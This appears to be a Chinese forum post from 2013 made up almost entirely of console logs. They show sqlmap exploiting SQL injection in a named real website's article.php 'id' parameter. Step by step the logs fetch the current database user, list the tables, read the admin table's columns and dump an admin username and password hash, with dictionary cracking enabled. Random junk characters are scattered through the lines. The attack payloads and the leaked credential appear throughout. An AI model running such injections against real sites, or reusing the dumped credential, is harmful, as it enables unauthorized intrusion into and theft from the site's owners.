D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( V) M& k$ _* F" x* o( v- Z _
ms "Mysql" --current-user /* 注解:获取当前用户名称
. H% b. M5 q5 ], ?0 R8 X sqlmap/0.9 - automatic SQL injection and database takeover tool9 q. c; m5 F+ [
http://sqlmap.sourceforge.net starting at: 16:53:54* ?* \/ m6 i- P/ ]9 h& |: w8 o4 `+ U
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
6 D( s( g* X! M) G; z0 F2 v) [ session file2 B% E/ b, K: p! [, M1 T2 [" t* P
[16:53:54] [INFO] resuming injection data from session file0 Y6 M2 p) c0 X8 v! d1 U# d& C
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% v) k" _- |, h: O# w[16:53:54] [INFO] testing connection to the target url! ~, M, M# M3 c8 ~( ^ X9 q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ K% {, e' u5 P( o+ B& p
sts:
/ |( p" A; a: N1 n2 x% L/ Z---
, ?! t3 l" |9 g9 K7 N9 A0 oPlace: GET- {3 O" B ?# _+ ?: d
Parameter: id* e4 S4 m" v# a
Type: boolean-based blind
* R; i0 m) n/ b* O Title: AND boolean-based blind - WHERE or HAVING clause
3 l, B, g4 C/ M/ f* K: U- I Payload: id=276 AND 799=7999 c4 J$ A% k: Q4 z& q* b/ ^
Type: error-based4 N. m# Z5 q7 E" a
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" Z: W9 b) F8 r( {3 F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ Q4 `4 Q+ b2 A3 f0 s120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 d' d6 o/ V, x' A( [# ~: [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). Z2 c1 e( k7 g9 Y5 v
Type: UNION query4 t" [" F: K. E$ w; s2 e# U
Title: MySQL UNION query (NULL) - 1 to 10 columns
& z7 b' l# _; I, l Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; P& Q7 t$ c, i8 _: B; I(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 y) }1 M' K& `8 ?4 e+ |9 W! fCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 G; Q9 G4 n/ b0 K* Y' A Type: AND/OR time-based blind
/ V3 a2 h2 j2 B: W% k) O% j Title: MySQL > 5.0.11 AND time-based blind
- E- w2 L7 c9 T% n! C Payload: id=276 AND SLEEP(5)( n% S2 S ` P3 u
---8 P* x) Z" v6 @, B! w
[16:53:55] [INFO] the back-end DBMS is MySQL7 x6 _6 t4 ^2 D1 x6 y" I# n
web server operating system: Windows
/ C) U3 m# [, ]- `4 B/ ^# Wweb application technology: Apache 2.2.11, PHP 5.3.0
# g: e* w# X6 Q rback-end DBMS: MySQL 5.0 z5 v! W2 ~6 x) T7 J- w
[16:53:55] [INFO] fetching current user
2 @6 ]; M6 V0 Ncurrent user: 'root@localhost'
) T: G5 }% x' m/ w. Z[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 |: S: V+ A# W+ F6 B Z, G
tput\www.wepost.com.hk' shutting down at: 16:53:58
$ a% U* [% t1 c3 A7 q
8 ]1 }! W0 x# F: pD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db C P0 @8 l/ ]% S! P3 O" q
ms "Mysql" --current-db /*当前数据库1 d! X8 E" g2 G( s* b5 |9 t8 I
sqlmap/0.9 - automatic SQL injection and database takeover tool+ c: o# i5 S4 ^4 Z V& G! k; c
http://sqlmap.sourceforge.net starting at: 16:54:16: q: @5 w: m X, ~
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 B& v8 B D8 [9 P
session file
i6 m" S6 I3 _2 M5 H3 K, N; G[16:54:16] [INFO] resuming injection data from session file6 J. e2 S: P! ~
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 ?% w1 J% I! }- Y* }
[16:54:16] [INFO] testing connection to the target url
% u$ L5 j; f. I* n6 p* y6 e7 ysqlmap identified the following injection points with a total of 0 HTTP(s) reque
% T+ v$ A2 v7 B# I: e- qsts:7 K9 y$ J, a+ x1 V! J8 h+ ~7 t
---
+ J6 o; Q0 d( k, e% J$ LPlace: GET
/ e/ c/ ]. M# x! c( [8 s+ TParameter: id$ N" |7 X& [3 L$ `& L4 m
Type: boolean-based blind+ f/ h+ D4 D' j2 t% G4 M
Title: AND boolean-based blind - WHERE or HAVING clause
/ T+ O8 t: _7 f* ? Payload: id=276 AND 799=799
% D+ _ x$ K; C Type: error-based7 K+ `6 H! o0 }
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) q8 k( m/ E' }# D. U. x4 M& v
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 u' x+ q, a0 a120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 w! v; H/ g* o) d! \),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
9 Z" S Z4 a" E Type: UNION query: V2 m9 H: m/ x5 K$ Z- f+ T! S4 k
Title: MySQL UNION query (NULL) - 1 to 10 columns3 g. f. n4 C- W0 k
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 x/ O" B- h1 Y6 T8 Z) B$ a" y# j7 i' j
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
) {7 \& p2 Z6 C |+ ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 X4 J! B/ @ Q$ ~! w' y9 l
Type: AND/OR time-based blind
7 [. S# O( m* R9 m) t5 X* y4 k Title: MySQL > 5.0.11 AND time-based blind
! J* l- Y5 _8 \) `$ A' R; t Payload: id=276 AND SLEEP(5)5 F: K& K& {( M5 ?& ?
---4 g% h9 N: Q3 s7 U5 d8 F) F
[16:54:17] [INFO] the back-end DBMS is MySQL
- M5 K, o7 `( X3 p( D! ^" I9 a$ T! sweb server operating system: Windows
0 d% U; U1 g- r3 qweb application technology: Apache 2.2.11, PHP 5.3.0/ s; K& U a, P. e: B9 H8 g5 X/ n
back-end DBMS: MySQL 5.0
' K8 z0 ^0 z1 p1 l[16:54:17] [INFO] fetching current database
5 n: y8 {- G i8 Tcurrent database: 'wepost'
+ W/ _# m; j2 @ N2 q. h1 t5 {[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
4 ^$ ~& l# u' L, q' ttput\www.wepost.com.hk' shutting down at: 16:54:18' J) T6 V- _' `, r! U0 x
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% Z- ?! i5 W C& H, cms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
$ S0 I' X& _8 v) J; Q9 O sqlmap/0.9 - automatic SQL injection and database takeover tool3 e9 }9 J( Y6 E: s
http://sqlmap.sourceforge.net starting at: 16:55:25- |' r3 ?( [* V1 x2 ?. G8 Q& ~
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
( A6 N8 O% m! W session file& n' t) o; V+ |
[16:55:25] [INFO] resuming injection data from session file
( e' a9 _9 ?5 w[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
# F' ~% O& u6 b% r[16:55:25] [INFO] testing connection to the target url
" \# h/ X% c7 j2 o5 Csqlmap identified the following injection points with a total of 0 HTTP(s) reque l8 {1 E% \4 z8 w# ]# p2 v; g+ l( T
sts:
: Z! U) b3 q O% I% H---" a9 E3 G: a" k7 m' b1 E
Place: GET1 P- W6 z' y7 i, z; T
Parameter: id
$ F0 q" F5 C; F7 @ P& w& {# K Type: boolean-based blind7 Q6 s' u) a2 Z" f. Z
Title: AND boolean-based blind - WHERE or HAVING clause
% i* V3 r8 M% q7 j$ P9 H$ d2 | Payload: id=276 AND 799=799: J6 \' T; v O' Y
Type: error-based
# S3 F- R5 G6 j4 v9 V Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' O+ I* `, I7 ~2 P9 b5 Q& Y% f
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" J* S# N0 m, Y' k r120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 X9 B$ Z) d$ k' }/ K# ?: i) i/ B8 L),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# E7 | `: A$ y* O' c; q1 `9 ?
Type: UNION query# R$ v: \" \, N& p9 ?9 s; C0 |: L
Title: MySQL UNION query (NULL) - 1 to 10 columns0 q4 p8 u& t! u! A& x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ o3 w! V! l q! w6 d9 u6 W
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 ^7 n* G4 d9 r) lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 }# F* J$ o& R. {: L& M Type: AND/OR time-based blind
- Q/ @3 l4 W' f7 {+ r3 N Title: MySQL > 5.0.11 AND time-based blind( d# c8 X. R. i) F
Payload: id=276 AND SLEEP(5)
: a. v2 _% t- F* Q$ p4 [---2 u' G `" o" v% V! i
[16:55:26] [INFO] the back-end DBMS is MySQL
5 y1 h& K# |- \: N/ sweb server operating system: Windows6 w3 `% M9 O1 J
web application technology: Apache 2.2.11, PHP 5.3.0
& _9 P8 X! E) y- A; j; Qback-end DBMS: MySQL 5.0
9 |: E9 p) ~1 T[16:55:26] [INFO] fetching tables for database 'wepost'( L. G$ D p& j$ S7 `
[16:55:27] [INFO] the SQL query used returns 6 entries$ D3 w7 m& O' _+ T5 P5 S
Database: wepost2 c h+ K7 r) g+ |' o+ c. g8 T* k% L
[6 tables]
$ E! T4 U% Z) J+-------------+# g4 \+ q0 K' ^, S
| admin |
7 |9 _: r2 w* e3 W4 l| article |
) P u- \/ o4 \| contributor |
, }( f% c# W9 Q1 _| idea |
# C5 G, V# H* k| image |
5 q' T U6 i3 q: ]+ ?) T. G| issue |
6 d; a% N0 l% O' e0 h2 Y+-------------+$ ]4 n3 ?& d0 R* [& m+ C
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou: B3 w% u6 K ~3 N# y
tput\www.wepost.com.hk' shutting down at: 16:55:33
8 g7 `' @, \7 Q8 k6 F' P) ^5 g) ]4 P* @
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) d% B5 [0 J7 F9 r2 l4 m
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名1 a9 F$ m8 F Y) L$ F6 B/ }
sqlmap/0.9 - automatic SQL injection and database takeover tool @5 G8 c, h6 ~2 ?' M* ~8 T7 L K& D
http://sqlmap.sourceforge.net starting at: 16:56:06$ M4 I9 e! O6 e% Q$ L
sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 g# ^7 P5 G: e
sts:
" l; Z7 F! v; F---
5 A" e/ \$ K; b6 t/ H4 X9 b* cPlace: GET# r- W# E7 x6 E' P1 N. B# ]
Parameter: id
. `& I$ ?+ s: X. d Type: boolean-based blind; Q- v; w; ]* ^- o% H
Title: AND boolean-based blind - WHERE or HAVING clause
' ]1 T3 r/ y9 }7 m Payload: id=276 AND 799=799
& }" w/ n) w. }$ o5 v, Z: b7 ^ Type: error-based
* c W# H% Y3 D2 n- h Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 z( F; X3 n9 {: A3 F$ h5 F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. j% H! P! B2 _! h& u, W# f; i3 K0 U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ _1 l$ T! V/ |* S- ^9 _/ v
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 y# F; Z4 v, ^: A# v8 z
Type: UNION query0 \& y& p8 t! O) I3 o4 X2 p
Title: MySQL UNION query (NULL) - 1 to 10 columns
; U* O4 b! |1 q Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% H/ m: C. t- x0 _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ |, [! L3 W7 R( k/ [# ]CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; D1 D# T3 z) c8 i: D# c3 [* ? Type: AND/OR time-based blind
3 {9 Y/ m: W8 i$ t; f$ G Title: MySQL > 5.0.11 AND time-based blind
, |! q6 X; E. v4 P" n6 g v Payload: id=276 AND SLEEP(5)
0 ~* o; d% m- Q- ]+ N. k---
# c$ b# R% X/ r2 Wweb server operating system: Windows1 [9 Q- Z8 G7 ^9 \. ? Q
web application technology: Apache 2.2.11, PHP 5.3.0
. ^) {) l {2 m: ^( |% ~- Z$ mback-end DBMS: MySQL 5.01 n6 W0 g. e2 C1 g. M# R3 ~: p
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
) d) `, E" R+ u9 pssion': wepost, wepost
& q( ^" b2 ]: w iDatabase: wepost
' c% g9 {' \8 U, Z- n1 H( aTable: admin5 h8 e8 W( A" B
[4 columns]
& I+ s _, j' {) J+ ^9 m+----------+-------------+) b: y6 M! l6 {1 m# b
| Column | Type |
- O" J) g8 f# Y$ l+----------+-------------+
1 ]7 {( C- O& O| id | int(11) |- ^& U( c: j/ i$ S" L$ B
| password | varchar(32) |
% H8 N m7 A- Z' u; R* n$ Z4 || type | varchar(10) |
+ c U9 B6 T# r; R6 h| userid | varchar(20) |3 I l) M, E7 H' O) B
+----------+-------------+# p1 b9 ` t1 S* h9 l' W' G
shutting down at: 16:56:19* r- W# T2 @( z! D# N7 U4 W
0 M; ~. n; h2 n; h
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 Q: u. _( ^" p9 j0 Q, Z
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
& l) X, ?5 x) I5 V' W# Q3 e sqlmap/0.9 - automatic SQL injection and database takeover tool2 V' |# s1 A( q2 ~7 J1 `! M/ }
http://sqlmap.sourceforge.net starting at: 16:57:14, Q) c* U) u6 l; _; M. Q0 r
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ P. M) F: P* p
sts:# h/ a, E) l/ Z" _6 N5 r
---
: M2 U, f5 J/ { m. Z& r# l" CPlace: GET
- c0 R% L! W" K( j- L/ }& xParameter: id
& E8 J0 U0 u! a7 q3 ^* D Type: boolean-based blind7 \/ W: q; Q+ z! l R; Y: d! c
Title: AND boolean-based blind - WHERE or HAVING clause% i: `' | _) f+ c
Payload: id=276 AND 799=799: w( x: ]$ S8 K6 L
Type: error-based! i- e- V* b. A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause8 P2 k# I/ d* D$ q8 {/ v, ?! Q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
# J f6 T% d! W- } X120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! h' d, |7 ?# Q- U# R/ s
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) C- V, S" [6 ]+ A
Type: UNION query o4 J3 s; W7 \+ [
Title: MySQL UNION query (NULL) - 1 to 10 columns3 J: B* _% C* z4 o% d
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! M* }$ I1 g3 n% L& c6 N! D(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 X* b7 R d7 p) WCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: x; I8 B8 w/ P( X3 h& j _: D
Type: AND/OR time-based blind( h" K: q& a5 K' j2 [" d
Title: MySQL > 5.0.11 AND time-based blind
: ~3 P3 w. g9 A( E$ m Payload: id=276 AND SLEEP(5)
0 a0 s T0 q G1 H---# u" S- m" h- M* @' v
web server operating system: Windows
' i. l) d# _5 N6 T6 v& Iweb application technology: Apache 2.2.11, PHP 5.3.0
0 P4 e/ G, Y2 y0 aback-end DBMS: MySQL 5.0; d/ Z$ i7 B0 x# M: I
recognized possible password hash values. do you want to use dictionary attack o* q' E( Y% l1 ^) |8 d) @" _" i
n retrieved table items? [Y/n/q] y
, {: d# P* R2 \' G& v) p3 pwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]" h V3 ^" S, c4 p7 I3 M& F, G2 a# R
do you want to use common password suffixes? (slow!) [y/N] y
+ Z, a; l6 q4 m+ EDatabase: wepost6 t% n! M* Y# ^; c! j* @- e
Table: admin) [) n0 {8 Q9 n/ T; z" ]2 y
[1 entry]0 _: f' r4 @& ^' n
+----------------------------------+------------+
* N1 \* t$ D/ L3 h| password | userid |3 n. D4 E$ `8 t4 g2 }
+----------------------------------+------------+
! G V7 {( Y! J z5 z) H| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
; z- r# e3 g& T7 v+----------------------------------+------------+
1 p( l" P5 G+ O5 @' {$ i shutting down at: 16:58:14# w l e( M* i9 S% C
; l1 U, H4 n9 n* M' {# BD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对